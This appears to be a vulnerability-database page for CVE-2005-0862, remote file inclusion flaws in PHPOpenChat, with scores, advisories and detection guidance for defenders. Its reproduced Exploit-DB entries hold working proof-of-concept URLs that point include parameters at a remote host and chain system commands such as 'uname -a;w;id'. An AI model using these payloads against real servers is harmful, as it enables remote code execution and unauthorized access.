CVE-2005-0862
published 2005-05-02CVE-2005-0862: Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the…
PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
10.92%
95.3th percentile
Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter to (1) poc_loginform.php or (2) phpbb/poc.php, the poc_root_path parameter to (3) phpbb/poc.php, (4) phpnuke/ENGLISH_poc.php, (5) phpnuke/poc.php, or (6) yabbse/poc.php, or (7) the sourcedir parameter to yabbse/poc.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpopenchat | phpopenchat | — | — |
| phpopenchat | phpopenchat | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests containing 'phpbb_root_path', 'poc_root_path', or 'sourcedir' parameters with remote HTTP/HTTPS URLs as values — a hallmark of PHP remote file inclusion exploitation against PHPOpenChat. ↗
- →Alert on inbound GET/POST requests to paths matching */contrib/phpbb/*/poc_loginform.php, */contrib/phpnuke/poc.php, */contrib/phpnuke/ENGLISH_poc.php, or */contrib/yabbse/poc.php with any parameter value beginning with 'http://' or 'https://'. ↗
- →Presence of a 'cmd' parameter alongside the RFI parameter (e.g., &cmd=uname%20-a;w;id;pwd;ps) indicates active exploitation with OS command injection chained to the file inclusion. ↗
- ·The RFI attack requires PHP's 'allow_url_include' (or 'allow_url_fopen' in older PHP versions) to be enabled. Installations with these directives disabled are not exploitable via this vector. ↗
- ·All affected files reside under the 'contrib/' directory tree; deployments that do not expose or have removed the contrib/ directory reduce their attack surface significantly. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gj4f-h9q6-3q6j: Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3
ghsa_unreviewed·2022-05-01
CVE-2005-0862 [HIGH] GHSA-gj4f-h9q6-3q6j: Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3
Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter to (1) poc_loginform.php or (2) phpbb/poc.php, the poc_root_path parameter to (3) phpbb/poc.php, (4) phpnuke/ENGLISH_poc.php, (5) phpnuke/poc.php, or (6) yabbse/poc.php, or (7) the sourcedir parameter to yabbse/poc.php.
VulnCheck
phpopenchat phpopenchat Improper Control of Generation of Code ('Code Injection')
vulncheck·2005·CVSS 7.5
CVE-2005-0862 [HIGH] phpopenchat phpopenchat Improper Control of Generation of Code ('Code Injection')
phpopenchat phpopenchat Improper Control of Generation of Code ('Code Injection')
Multiple PHP remote file inclusion vulnerabilities in PHPOpenChat 3.0.1 and earlier allow remote attackers to execute arbitrary PHP code via the phpbb_root_path parameter to (1) poc_loginform.php or (2) phpbb/poc.php, the poc_root_path parameter to (3) phpbb/poc.php, (4) phpnuke/ENGLISH_poc.php, (5) phpnuke/poc.php, or (6) yabbse/poc.php, or (7) the sourcedir parameter to yabbse/poc.php.
Affected: phpopenchat phpopenchat
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-c
No detection rules found.
Exploit-DB
PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion
exploitdb·2005-03-15
CVE-2005-0862 PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/12817/info
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
Exploit-DB
PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion
exploitdb·2005-03-15
CVE-2005-0862 PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/12817/info
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.
http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
Exploit-DB
PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion
exploitdb·2005-03-15
CVE-2005-0862 PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/12817/info
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.
http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
No writeups or analysis indexed.
http://secunia.com/advisories/14600http://securitytracker.com/id?1013434http://www.albanianhaxorz.org/advisory/phpopenchaten.txthttp://www.osvdb.org/14807http://www.osvdb.org/14808http://www.osvdb.org/14809http://www.securityfocus.com/archive/1/465237/100/0/threadedhttp://www.securityfocus.com/bid/12817http://www.zone-h.org/advisories/read/id=7310https://exchange.xforce.ibmcloud.com/vulnerabilities/19721http://secunia.com/advisories/14600http://securitytracker.com/id?1013434http://www.albanianhaxorz.org/advisory/phpopenchaten.txthttp://www.osvdb.org/14807http://www.osvdb.org/14808http://www.osvdb.org/14809http://www.securityfocus.com/archive/1/465237/100/0/threadedhttp://www.securityfocus.com/bid/12817http://www.zone-h.org/advisories/read/id=7310https://exchange.xforce.ibmcloud.com/vulnerabilities/19721
2005-05-02
Published
Exploited in the wild